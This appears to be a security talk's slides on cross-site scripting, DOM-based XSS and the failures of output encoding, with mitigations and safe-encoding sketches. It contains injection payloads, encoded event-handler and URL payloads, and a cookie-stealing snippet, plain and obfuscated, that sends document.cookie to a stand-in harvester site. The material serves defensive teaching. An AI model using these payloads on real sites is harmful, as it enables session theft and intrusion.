
Understanding XSS and Proper Output Encoding

By Abraham Kang, Principal Security Researcher, HP Fortify

Goals
Understand the traditional and DOM-based XSS threats
Understand how to mitigate DOM-based XSS
Better understand the output encoding misuse cases
If you need to understand traditional XSS, see:
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet

XSS Threats
Session Cookie Theft and Hijacking
Accessing Local Storage
Key Logging
Internal Network Scanning
Targeted Drive-by Downloads
A lot more bad stuff

Traditional XSS
Traditional XSS (Page Rendering Restructuring Attacks)
Injecting Up
<TITLE><%=request.getParameter("input")%></TITLE>
Attacker passes in: <script>mal_code()</script>

<INPUT name="full_name" value='<%=req.getParameter("full_name")%>' />
Attacker passes in: x' onblur="mal_code()" x='

Injecting Down
<a href='<%=req.getParameter("input")%>'></a>
Attacker passes in: javascript:mal_code(), vbscript:mal_code(), or a data: URL

Traditional 6 XSS Contexts


HTML
between HTML tags

CSS
between <style> tags or in style attribute of HTML tag

URL
HTML attribute which takes URL (src, href, backgroundUrl, etc.)

JavaScript Event Handler attributes
usually start with on* (e.g. onload, onblur, onclick, etc.)

HTML Attribute
any attribute which is not a CSS or URL attribute (name, value, id, etc.)

JavaScript Body
in between <script> tags

Mitigate by using the appropriate encoding for each context.

Review of DOM

window.location = userInput;
document.forms[0].i1.value = <%=req.getParameter("test")%>;
document.getElementById("i1").value = "Bob";

What's Old Is New


<DIV id="div1">HTML CONTEXT</DIV>
document.getElementById("div1").innerHTML = input;

<a id="a1" href="URL CONTEXT">Test</a>
document.getElementById("a1").href = input;

<style>CSS CONTEXT</style> <div style="CSS CONTEXT">
document.body.style = input;

<a id="a2" href="#" onclick="EVENT HANDLER CTX">
document.getElementById("a2").setAttribute("onclick", input);

<SCRIPT>JAVASCRIPT CONTEXT</SCRIPT>
document.scripts[0].text = input;

<INPUT type="text" name="i2" value="HTML ATTRIBUTE CONTEXT" />
document.forms[0].i2.value = input;

DOM Based XSS


Untrusted data is passed to/consumed by JavaScript methods which:
Render HTML through DOM methods (subject to Page Rendering Restructuring Attacks)
Pass untrusted data to code-executing JS functions
Pass untrusted data to traditional XSS contexts (represented in the DOM) where the attribute datatype is a String
Pass untrusted data to DOM methods which coerce strings into their native JS types

DOM Based XSS 1 (Rendering HTML)


Render HTML through HTML-rendering DOM methods (subject to Page Rendering Restructuring Attacks)

buildEchoPage('<%=req.getParameter("input1")%>', '<%=req.getParameter("returnUrl")%>');

function buildEchoPage(input1, myURL) {
  document.write("<HTML><head><TITLE>Echo Page</TITLE></head>");
  document.write("<body> Echo: " + input1);
  document.write("<a href=\"" + myURL + "\"> Return to home page </a> " + "</body></html>");
}

The same applies to element.innerHTML, element.outerHTML and document.writeln().

DOM Based XSS 1 (Rendering HTML)


Render HTML through HTML-rendering DOM methods (subject to Page Rendering Restructuring Attacks)

buildEchoPage('<%=DefaultEncoder.encodeForJavascript(req.getParameter("input1"))%>',
              '<%=DefaultEncoder.encodeForJavascript(req.getParameter("returnUrl"))%>');

function buildEchoPage(input1, myURL) {
  document.write("<HTML><head><TITLE>Echo Page</TITLE></head>");
  document.write("<body> Echo: " + input1);
  document.write("<a href=\"" + myURL + "\"> Return to home page </a> " + "</body></html>");
}

Mitigating DOM Based XSS 1a


Do all encoding (server side) before placing data in page entry point
buildEchoPage('<%=DefaultEncoder.encodeForJavascript(DefaultEncoder.encodeForHTML(req.getParameter("input1")))%>',
              '<%=DefaultEncoder.encodeForJavascript(DefaultEncoder.encodeForURL(req.getParameter("returnUrl")))%>');

function buildEchoPage(input1, myURL) {
  document.write("<HTML><head><TITLE>Echo Page</TITLE></head>");
  document.write("<body> Echo: " + input1);
  document.write("<a href=\"" + myURL + "\"> Return to home page </a> " + "</body></html>");
}

Mitigating DOM Based XSS 1b


JavaScript-encode (server side) before placing data in the page entry point, and HTML/URL-encode within JavaScript

buildEchoPage('<%=DefaultEncoder.encodeForJavascript(req.getParameter("input1"))%>',
              '<%=DefaultEncoder.encodeForJavascript(req.getParameter("returnUrl"))%>');

function buildEchoPage(input1, myURL) {
  document.write("<HTML><head><TITLE>Echo Page</TITLE></head>");
  document.write("<body> Echo: " + $ESAPI.encoder().encodeForHTML(input1));
  document.write("<a href=\"" + $ESAPI.encoder().encodeForURL(myURL) + "\"> Return to home page </a> " + "</body></html>");
}
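The client-side half of approach 1b can be sketched without a browser by building the page as a string. This is a minimal sketch, not the ESAPI implementation: encodeForHTML and buildEchoHtml are hypothetical names, and encodeURIComponent stands in for encodeForURL, which suits relative URLs only.

```javascript
// Hypothetical stand-in for an HTML encoder: every non-alphanumeric
// character becomes a numeric entity such as &#x3c;
function encodeForHTML(value) {
  return String(value).replace(/[^A-Za-z0-9]/gu, (ch) =>
    "&#x" + ch.codePointAt(0).toString(16) + ";");
}

// Builds the echo page markup; both untrusted values are encoded for the
// context they land in (HTML body text, then a URL attribute).
function buildEchoHtml(input1, myURL) {
  return "<html><head><title>Echo Page</title></head>" +
    "<body> Echo: " + encodeForHTML(input1) +
    "<a href=\"" + encodeURIComponent(myURL) + "\"> Return to home page </a>" +
    "</body></html>";
}

const page = buildEchoHtml("<script>mal_code()</script>", "\" onclick=\"mal_code()");
console.log(page);
```

The injected tag and the attribute break-out both arrive as inert text because neither `<` nor `"` survives encoding.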

DOM Based XSS 2 (code evaluating functions)


Pass untrusted data to code-executing JS functions:

executeCode('<%=req.getParameter("user_input")%>');

function executeCode(input) {
  eval(input);
  setTimeout(input, x);
  setInterval(input, x);
  new Function(input);
  scriptElement.text = input;
  __defineSetter__("x", eval); x = input;
  window[x](input); // or top[x](input)
  input.replace(/.+/, function($1) { /* code which operates on $1 */ });
}

Mitigating DOM Based XSS 2 (code evaluation)


Always delimit user input in between quotes (' and ")
Don't execute script code from user input.
Use a level of indirection between the contents of script code and user input.
Limit left side operations:
window[x] = input; or top[x] = input;

Use the appropriate layers of encoding or closures:

setTimeout("customFunction('<%=doubleJavaScriptEncodedData%>', y)");
function customFunction(name) { alert("Hello" + name); }

setTimeout((function(param) { return function() { customFunction(param); } })("<%=Encoder.encodeForJS(untrustedData)%>"), y);
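One way to read "a level of indirection" is a fixed lookup table: user input only selects among functions the developer wrote, and is never evaluated as code. The sketch below assumes hypothetical action names (greet, shout) and a hypothetical runAction helper.

```javascript
// Developer-defined actions; user input can pick one but cannot add code.
const allowedActions = Object.freeze({
  greet: (name) => "Hello " + name,
  shout: (name) => String(name).toUpperCase(),
});

function runAction(actionName, argument) {
  // hasOwnProperty rejects inherited names such as "constructor".
  if (!Object.prototype.hasOwnProperty.call(allowedActions, actionName)) {
    throw new Error("Unknown action");
  }
  return allowedActions[actionName](argument);
}

console.log(runAction("greet", "Bob"));
```

Here the untrusted argument is only ever treated as data, so a value like `alert(1)` is displayed rather than run.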

DOM Based XSS 3 (Traditional Contexts)


Pass untrusted data to traditional XSS contexts where the attribute datatype is a String:
function buildLink() {
  document.body.style.backgroundImage = "url(vbscript:Alert(99))";
  var linkTag = document.createElement("link");
  linkTag.setAttribute("rel", "stylesheet");
  linkTag.href = "data:,*%7bx:expression(alert(2))%7d"; // Works
  linkTag.href = "data:,%2a%7b%78%3a%65%78%70%72%65%73%73%69%6f%6e%28%61%6c%65%72%74%28%32%29%29%7d"; // DOES WORK
  var anchorTag = document.createElement("a");
  anchorTag.onmouseover = "alert(1)"; // DOES NOT WORK
  document.body.appendChild(anchorTag);
}

Mitigating DOM Based XSS 3 (Traditional Contexts)


When setting DOM URL attributes:
URL-encode the whole URL if you are using relative URLs.
Ensure that the URL passed in starts with https:// and URL-encode the rest of the string (if using absolute URLs).
Use a level of indirection for CSS DOM attributes.
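The two URL rules above might be sketched as follows. The function names are hypothetical, and the standard URL class does the encoding of the remainder, which is one possible interpretation of "URL encode the rest of the string".

```javascript
// Relative URLs: encode the whole value so it cannot carry a scheme.
function encodeRelativeUrl(input) {
  return encodeURIComponent(String(input));
}

// Absolute URLs: accept only values that start with https://, then let the
// URL parser normalise and percent-encode the remainder. Returns null when
// the value is rejected.
function safeAbsoluteUrl(input) {
  if (typeof input !== "string" || !input.toLowerCase().startsWith("https://")) {
    return null;
  }
  let parsed;
  try {
    parsed = new URL(input);
  } catch {
    return null;
  }
  return parsed.protocol === "https:" ? parsed.href : null;
}

console.log(safeAbsoluteUrl("https://example.com/a b?q=1"));
console.log(safeAbsoluteUrl("javascript:mal_code()"));
console.log(encodeRelativeUrl("javascript:alert(1)"));
```

A caller would assign the result to href or src only when it is not null.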

DOM Based XSS 4 (through setAttribute)


Pass untrusted data to DOM methods which coerce strings into their native JS types:
function buildLink(input) {
  var linkTag = document.createElement("a");
  linkTag.setAttribute("onclick", "alert(123)");
  linkTag.setAttribute("onmouseover", "alert(123)");
  document.body.appendChild(linkTag);
}

Mitigating DOM Based XSS 4 (through setAttribute)


Do not pass in user-controlled script to execute within JavaScript event handlers.
Do not allow user-controlled input to set the attribute name.
Use the appropriate encoding for the value of the attribute.
Apply additional encoding for usage in a function, or encode in JS just before use.

linkTag.setAttribute("onmouseover", "myJSFunc('<%=DefaultEncoder.encodeForJavascript(req.getParameter("name"))%>')");

DOM XSS 5 (in HTML attribute context)


Because the HTML attribute context inherently includes attributes which are not defined in the URL, CSS, and event handler contexts, their exploitability is limited. The one major exception is when setting the text node or attribute of an inherently dangerous HTML tag (<script>, <object>, etc.).

/* Works in FF3.6 but not in IE8 */
s = document.createElement("script");
t = document.createTextNode("alert('textNode')");
s.appendChild(t);
document.body.appendChild(s);

document.scripts[1].text = "alert('scripts[1]')";

Mitigation: Don't let users create SCRIPT elements.

DOM Based XSS 6 (Chameleon Context)


window[inputVar1] = inputVar2; top[inputVar1] = inputVar2;

Mitigation: Don't let users determine the attribute of objects (left side operations).
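When a property name really must come from input, a fixed allowlist keeps the left side under the developer's control. This is a sketch under that assumption; settableKeys and setPreference are hypothetical names.

```javascript
// Only these property names may ever be assigned from user input.
const settableKeys = new Set(["theme", "fontSize"]);

function setPreference(target, key, value) {
  if (!settableKeys.has(key)) {
    return false; // refuse names such as "onload", "location" or "__proto__"
  }
  target[key] = String(value); // the value is stored as plain data
  return true;
}

const prefs = {};
console.log(setPreference(prefs, "theme", "dark"));
console.log(setPreference(prefs, "onload", "mal_code()"));
```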

Problems Associated with Mitigating XSS Using Output Encoding


Understanding the characters encoded by the encoding library used by the developer
Understanding the encoding's result
Side effects of encoding (parser ordering)
Encoding fails (CSS)

Characters Encoded by Encoding Library


<bean:write> and <c:out>: ', ", <, >, &
Apache StringEscapeUtils 2.0
    escapeJavascript: ', ", \ become \', \", \\ but all other characters between 33 and 127 are left alone
    escapeHTML: ", <, >, &
.NET HttpUtility: ", <, >, &
ESAPI: all non-alphanumeric characters

Encoding Semantics
HTML: &lt; or &#999; or &#xfff;
JavaScript: \x3c or \u003c
URL: %3c
CSS: \3c or \(
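The same character takes a different escaped form in each context. A small sketch, assuming a hypothetical encodeCharFor helper limited to single ASCII characters, makes the mapping concrete:

```javascript
// Returns the escaped form of one ASCII character for the given context.
function encodeCharFor(context, ch) {
  const code = ch.charCodeAt(0);
  if (ch.length !== 1 || code > 0x7f) {
    throw new RangeError("sketch handles single ASCII characters only");
  }
  const hex = code.toString(16);
  const hex2 = hex.padStart(2, "0");
  switch (context) {
    case "html": return "&#x" + hex + ";";
    case "javascript": return "\\x" + hex2;
    case "url": return "%" + hex2;
    case "css": return "\\" + hex + " "; // trailing space terminates a CSS hex escape
    default: throw new Error("unknown context: " + context);
  }
}

for (const context of ["html", "javascript", "url", "css"]) {
  console.log(context, encodeCharFor(context, "<"));
}
```

An encoding that is correct for one context is just ordinary text to the parser of another, which is why the context has to be known before choosing the encoder.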

Side Effects
Parser ordering can affect the meaning of escaped values.
The HTML parser runs first:
Focused on HTML tags and the attributes of those tags
Only understands HTML escaping

The JavaScript, URL, and CSS parsers run afterwards on whatever the HTML parser hands to them.

The HTML parser will reverse encode

Reverse Encoding at Runtime

HTML encoding in event handlers:
onclick=&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29; //alert(1) WORKS

HTML and URL encoding in URL attributes (after protocol: for URL encoding):
href=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29; //alert(1) WORKS
href = "data:,%2a%7b%78%3a%65%78%70%72%65%73%73%69%6f%6e%28%61%6c%65%72%74%28%32%29%29%7d"; //DOES WORK
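The decoding that happens before the JavaScript or URL parser sees the value can be imitated outside a browser. In this sketch decodeNumericEntities is a hypothetical helper that handles numeric entities only, and decodeURIComponent plays the role of the URL decoder.

```javascript
// Imitates the HTML parser turning numeric character references back into text.
function decodeNumericEntities(text) {
  return text.replace(/&#x([0-9a-f]+);|&#([0-9]+);/gi, (match, hex, dec) =>
    String.fromCodePoint(hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10)));
}

const handler = "&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;";
console.log(decodeNumericEntities(handler)); // alert(1)

const dataBody = "%2a%7b%78%3a%65%78%70%72%65%73%73%69%6f%6e%28%61%6c%65%72%74%28%32%29%29%7d";
console.log(decodeURIComponent(dataBody)); // *{x:expression(alert(2))}
```

In both cases the encoded form hides the payload from a naive filter but not from the parser that finally consumes it.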

The JavaScript parser will reverse encode


URL encoding in URL attributes (after protocol: for URL encoding)
The HTML-encoded value attribute of HTML-rendered page elements retrieved via DOM methods

Encoding Fail #1 (Wrong Encoding)


<SCRIPT>
dofunc('<bean:write property="val1" />', '<c:out property="val2" />');
</SCRIPT>

Characters encoded by <bean:write> and <c:out>: ', ", <, >, &

<!DOCTYPE html>
<HTML><BODY><script>
<bean:write property="${param.script}" />
</script></BODY></HTML>

Characters encoded: ', ", <, >, &

Encoding Fail #1 (Wrong Encoding Exploit)

val1 = \
val2 = , 1);attack_code();//

<SCRIPT>
dofunc('\',', 1);attack_code();//');
</SCRIPT>

*Credit should be given to Jeremy Long for finding the exploit above

HTML5 automatically reverse HTML encodes characters in between the <script> tags at runtime.
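The backslash exploit above can be reproduced with a simplified model of an HTML-only encoder. Both encoders here are hypothetical stand-ins, not the Struts, JSTL or ESAPI code: encodeLikeBeanWrite covers only the five characters listed on the slide, and encodeForJs hex-escapes every non-alphanumeric character.

```javascript
// Simplified model of an HTML encoder: note that the backslash is not touched.
function encodeLikeBeanWrite(value) {
  const entities = { "'": "&#39;", '"': "&quot;", "<": "&lt;", ">": "&gt;", "&": "&amp;" };
  return String(value).replace(/['"<>&]/g, (ch) => entities[ch]);
}

// Simplified model of a JavaScript encoder: \xHH or \uHHHH for everything
// that is not a letter or digit.
function encodeForJs(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 256
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

function renderCall(encoder, val1, val2) {
  return "dofunc('" + encoder(val1) + "','" + encoder(val2) + "');";
}

const val1 = "\\";                      // a single backslash
const val2 = ", 1);attack_code();//";
console.log(renderCall(encodeLikeBeanWrite, val1, val2));
console.log(renderCall(encodeForJs, val1, val2));
```

With the HTML encoder the backslash escapes the closing quote of the first argument, so the second value is parsed as code. With the JavaScript encoder both values stay inside their string literals.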

Encoding Fail #2 (Parser Interaction)


<script>
x = "<%=StringEscapeUtils.escapeJavascript(req.getParameter("input"))%>";
</script>

<a href="#" onclick="<%=StringEscapeUtils.escapeJavascript(req.getParameter("input"))%>">

Characters escaped by escapeJavascript: ', ", \ become \', \", \\

Encoding Fail #2 (Parser exploit)


<script> x = "<%=JSEncodedInput%>"; </script>
becomes
<script> x = "</script><script>attack_code()</script><script>//"; </script>

<a href="#" onclick="<%=JSEncodedInput%>">
becomes
<a href="#" onclick="\" onblur=attack_code() x=\"">
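Both results above follow from an escaper that only knows about quotes and backslashes while the HTML parser runs first. The function below is a simplified, hypothetical model of that behaviour, not the Apache Commons code.

```javascript
// Simplified model: prefix ', " and \ with a backslash and leave the rest alone.
function escapeQuotesAndBackslashes(value) {
  return String(value).replace(/['"\\]/g, (ch) => "\\" + ch);
}

// Payload 1 contains no quotes or backslashes, so it passes through unchanged
// and the HTML parser ends the script block at the first closing tag.
const scriptPayload = "</script><script>attack_code()</script><script>//";
console.log(escapeQuotesAndBackslashes(scriptPayload) === scriptPayload);

// Payload 2: the added backslashes mean nothing to the HTML parser, which
// still sees a double quote and closes the onclick attribute there.
const attributePayload = "\" onblur=attack_code() x=\"";
console.log("<a href=\"#\" onclick=\"" + escapeQuotesAndBackslashes(attributePayload) + "\">");
```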

Encoding Fail #3 (Auto Reverse Escaping at Runtime)


<a href="#" onclick="jsfunc('<bean:write property="val1" />')">
Characters encoded: ', ", <, >, &

<a href="javascript:jsfunc('<%=URLEncoder.encode(req.getParameter("input"))%>');">
Alphanumerics stay the same, as well as . - _ *

<a href='<bean:write property="val1" />'>
Characters encoded: ', ", <, >, &

Encoding Fail #4 (Reverse Encoding upon DOM retrieval)


<form name="formName">
<input id="user_in" value="<c:out value='<%=req.getParameter("input")%>' />" />
</form>

Characters encoded: ', ", <, >, &

<script>
var x = document.getElementById('user_in').value;
document.write(x);
</script>

Encoding Fail #5 (HTML encoding everything upon input)


Some application frameworks will HTML encode all input coming into the application before it is retrieved by the application.

Where to encode then?

Black Lists Can Fail

var stolenCookie = document.cookie;
document.write("<img src=http://www.cookierHarvester.com/cookiereader.php?cookie=" + stolenCookie + "/>");

Or

eval(String.fromCharCode(
118,97,114,32,115,116,111,108,101,110,67,111,111,107,105,101,32,61,32,100,111,99,
117,109,101,110,116,46,99,111,111,107,105,101,59,100,111,99,117,109,101,110,116,46,
119,114,105,116,101,40,8220,60,105,109,103,32,115,114,99,61,104,116,116,112,58,47,
47,119,119,119,46,99,111,111,107,105,101,114,72,97,114,118,101,115,116,101,114,46,
99,111,109,47,99,111,111,107,105,101,114,101,97,100,101,114,46,112,104,112,63,99,
111,111,107,105,101,61,8221,32,43,32,99,111,111,107,105,101,32,43,32,8220,47,62,
8221,41,59))

The attacker just needs ( ) . and a comma.
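To see why a character black list is easy to sidestep, the sketch below rewrites a payload as a String.fromCharCode expression and runs it past a naive filter. Both toCharCodeExpression and naiveFilterRejects are hypothetical, and nothing is evaluated here.

```javascript
// Rewrites any string as a String.fromCharCode(...) expression, which needs
// only letters, digits, a dot, commas and parentheses.
function toCharCodeExpression(source) {
  const codes = source.split("").map((ch) => ch.charCodeAt(0));
  return "String.fromCharCode(" + codes.join(",") + ")";
}

// A naive black list that rejects quotes, angle brackets and equals signs.
function naiveFilterRejects(value) {
  return /['"<>=]/.test(value);
}

const payload = "document.write(\"<img src=x>\")";
const disguised = toCharCodeExpression(payload);

console.log(naiveFilterRejects(payload));   // true: the raw payload is caught
console.log(naiveFilterRejects(disguised)); // false: the disguised form passes
console.log(disguised);
```

Wrapped in eval, the disguised expression would rebuild and run the original payload, which is why encoding for the output context is preferred over filtering characters.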

Conclusion
Use the correct encoding for the DOM context you are placing data into.
Understand the characters encoded by the library you are using and how they apply to your context and the surrounding contexts.
Using the wrong encoding may still leave your app exploitable.
Read the DOM XSS Cheat Sheet:
https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet

Questions and Credits


?
Special Thanks to Jim Manico (WhiteHat), Jacob West (Fortify), Brian Chess (Fortify), Gaz Hayes, Stefano Di Paola (Minded Security), Achim Hoffman, RSnake, Mario Heiderich, John Stevens (Cigital), Mike Samuel (Google), Arian Evans (WhiteHat), Himanshu Dwivedi and Alex Stamos (iSec Partners)
